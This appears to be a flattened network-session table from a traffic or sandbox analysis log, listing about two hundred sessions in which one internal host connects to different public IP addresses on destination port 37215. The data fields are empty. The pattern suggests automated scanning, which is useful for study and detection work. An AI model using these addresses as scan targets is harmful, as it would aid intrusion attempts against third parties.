                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7686192.168.2.1352910197.27.222.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7687192.168.2.1354842157.116.106.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7688192.168.2.135168441.68.96.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7689192.168.2.133402831.171.208.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7690192.168.2.1344974197.208.6.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7691192.168.2.1357098197.98.170.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7692192.168.2.1349104197.142.136.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7693192.168.2.1351398197.33.132.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7694192.168.2.1346590197.223.93.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7695192.168.2.1347038157.204.18.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7696192.168.2.1345280157.64.212.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7697192.168.2.1350638220.164.208.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7698192.168.2.1359116157.89.102.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7699192.168.2.1343740157.44.56.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7700192.168.2.1346450197.200.155.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7701192.168.2.133951641.99.145.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7702192.168.2.1355984219.96.217.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7703192.168.2.133901641.123.143.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7704192.168.2.1347754157.70.133.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7705192.168.2.1340408157.211.214.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7706192.168.2.135614041.48.241.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7707192.168.2.1343968157.251.248.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7708192.168.2.134493641.194.225.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7709192.168.2.135150841.160.97.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7710192.168.2.1348762197.76.4.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7711192.168.2.133730441.119.253.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7712192.168.2.1341058197.135.73.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7713192.168.2.1360772157.31.147.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7714192.168.2.1343484197.112.22.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7715192.168.2.1337832197.238.173.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7716192.168.2.1336492197.107.73.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7717192.168.2.135589241.74.19.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7718192.168.2.134162685.67.44.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7719192.168.2.133776441.2.233.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7720192.168.2.1357644157.10.248.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7721192.168.2.135951241.245.25.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7722192.168.2.1341526197.123.65.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7723192.168.2.1352440157.245.5.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7724192.168.2.133391441.110.39.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7725192.168.2.133912459.193.232.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7726192.168.2.1356764157.59.196.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7727192.168.2.135173841.210.220.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7728192.168.2.1357466157.64.154.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7729192.168.2.1358872115.156.140.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7730192.168.2.1355722197.89.210.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7731192.168.2.1344530157.123.9.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7732192.168.2.1352238157.159.227.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7733192.168.2.1345860197.29.213.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7734192.168.2.1350254160.235.203.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7735192.168.2.135520241.217.47.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7736192.168.2.1334416157.132.11.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7737192.168.2.134606641.122.58.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7738192.168.2.136008241.43.119.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7739192.168.2.133695041.20.50.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7740192.168.2.1334990197.131.219.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7741192.168.2.135357441.71.66.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7742192.168.2.133586641.172.55.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7743192.168.2.1339758197.152.19.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7744192.168.2.13605722.205.214.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7745192.168.2.133788641.163.115.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7746192.168.2.133606841.6.114.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7747192.168.2.1352700157.76.248.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7748192.168.2.1359674197.91.246.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7749192.168.2.135853841.127.123.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7750192.168.2.1345762157.176.246.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7751192.168.2.1343288131.18.170.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7752192.168.2.135953241.24.80.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7753192.168.2.133990841.175.206.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7754192.168.2.1339628197.113.192.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7755192.168.2.1360746107.179.99.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7756192.168.2.135206041.117.34.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7757192.168.2.1347396157.245.102.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7758192.168.2.1349150197.220.38.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7759192.168.2.1353642157.14.229.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7760192.168.2.1341742157.155.114.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7761192.168.2.1333114139.125.143.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7762192.168.2.1338610174.29.82.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7763192.168.2.134857441.188.50.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7764192.168.2.1359106197.84.146.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7765192.168.2.1347132197.118.10.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7766192.168.2.1335390148.61.239.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7767192.168.2.1353198197.136.26.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7768192.168.2.133730027.255.126.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7769192.168.2.1351200118.35.42.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7770192.168.2.135449412.248.151.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7771192.168.2.133552841.90.120.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7772192.168.2.1353400197.235.13.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7773192.168.2.1347484197.201.82.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7774192.168.2.135783641.153.122.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7775192.168.2.1357126157.202.76.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7776192.168.2.1353580157.122.64.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7777192.168.2.1357234197.170.124.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7778192.168.2.1342506155.70.157.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7779192.168.2.1338158197.138.34.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7780192.168.2.1334130197.141.165.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7781192.168.2.134444246.14.61.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7782192.168.2.1355714197.74.28.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7783192.168.2.1347008114.173.233.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7784192.168.2.1337454197.92.134.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7785192.168.2.133632441.172.175.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7786192.168.2.133610441.18.93.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7787192.168.2.134091279.67.240.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7788192.168.2.135052041.30.49.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7789192.168.2.1343626161.180.103.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7790192.168.2.1342624157.159.125.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7791192.168.2.135036041.87.125.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7792192.168.2.1342718157.179.96.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7793192.168.2.1352376157.219.157.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7794192.168.2.1356742200.35.29.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7795192.168.2.1358642157.72.190.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7796192.168.2.1349846197.63.127.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7797192.168.2.1347140157.186.235.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7798192.168.2.134261641.194.167.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7799192.168.2.1360344114.121.3.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7800192.168.2.1351234119.95.60.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7801192.168.2.133325041.33.9.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7802192.168.2.135631441.231.172.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7803192.168.2.1335352197.12.19.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7804192.168.2.1356446197.251.252.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7805192.168.2.135238841.145.151.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7806192.168.2.135703641.20.15.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7807192.168.2.1355876197.69.216.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7808192.168.2.133533241.194.193.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7809192.168.2.1359408157.179.12.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7810192.168.2.1354426138.163.252.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7811192.168.2.134881241.147.132.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7812192.168.2.1347916157.45.164.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7813192.168.2.1337326197.210.26.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7814192.168.2.134781041.122.211.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7815192.168.2.133428680.196.228.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7816192.168.2.135263441.242.36.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7817192.168.2.1349524157.127.22.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7818192.168.2.1356880157.57.62.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7819192.168.2.1355970197.47.181.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7820192.168.2.1352144157.65.238.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7821192.168.2.133769619.54.121.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7822192.168.2.134772819.241.72.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7823192.168.2.134002641.213.254.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7824192.168.2.1345110200.146.231.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7825192.168.2.1351620157.203.100.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7826192.168.2.1360834157.170.41.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7827192.168.2.134329241.235.98.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7828192.168.2.133305614.254.180.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7829192.168.2.134013441.12.246.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7830192.168.2.133627641.180.211.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7831192.168.2.1359548172.162.251.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7832192.168.2.1345460157.167.151.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7833192.168.2.1334572197.253.226.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7834192.168.2.1356466197.117.223.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7835192.168.2.1351864157.84.35.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7836192.168.2.135659441.136.84.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7837192.168.2.13332689.110.173.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7838192.168.2.1345818197.126.98.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7839192.168.2.1344644157.230.181.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7840192.168.2.135501841.164.135.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7841192.168.2.1353636197.99.29.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7842192.168.2.1335120197.159.170.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7843192.168.2.135452641.232.90.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7844192.168.2.1353696197.139.143.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7845192.168.2.1354198197.5.247.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7846192.168.2.1344286197.212.85.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7847192.168.2.1337556157.120.151.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7848192.168.2.133290843.34.138.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7849192.168.2.1336712157.38.219.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7850192.168.2.133624841.31.150.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7851192.168.2.133434241.238.59.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7852192.168.2.134554825.171.52.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7853192.168.2.1340504157.90.112.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7854192.168.2.1336878197.123.167.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7855192.168.2.135278048.189.56.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7856192.168.2.136060440.201.168.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7857192.168.2.134029281.11.239.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7858192.168.2.1342946138.135.134.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7859192.168.2.1355830197.135.219.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7860192.168.2.1346580157.3.86.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7861192.168.2.1340184197.52.140.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7862192.168.2.1343824197.153.125.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7863192.168.2.1357528197.120.147.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7864192.168.2.1356722157.100.8.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7865192.168.2.1338978197.90.172.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7866192.168.2.133840041.78.191.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7867192.168.2.1350174154.192.10.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7868192.168.2.1337660197.153.17.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7869192.168.2.1354930197.133.19.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7870192.168.2.1349718197.38.125.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7871192.168.2.1359210197.222.176.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7872192.168.2.133369476.31.122.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7873192.168.2.13502004.174.230.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7874192.168.2.1341340124.54.202.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7875192.168.2.1335090197.172.9.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7876192.168.2.1335460132.36.37.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7877192.168.2.134068032.155.212.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7878192.168.2.135158485.3.14.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7879192.168.2.1355164157.0.167.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7880192.168.2.1336146133.75.173.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7881192.168.2.1351342197.226.71.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7882192.168.2.133999665.150.163.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7883192.168.2.1336050197.217.229.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7884192.168.2.135622241.119.206.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7885192.168.2.1337538112.158.4.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7886192.168.2.1340818197.93.44.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7887192.168.2.1344786181.234.92.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7888192.168.2.1336418197.146.221.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7889192.168.2.133547441.36.183.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7890192.168.2.1349430157.156.208.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7891192.168.2.1355206130.249.242.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7892192.168.2.135159841.22.65.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7893192.168.2.1356412157.122.219.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7894192.168.2.1346068220.8.142.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
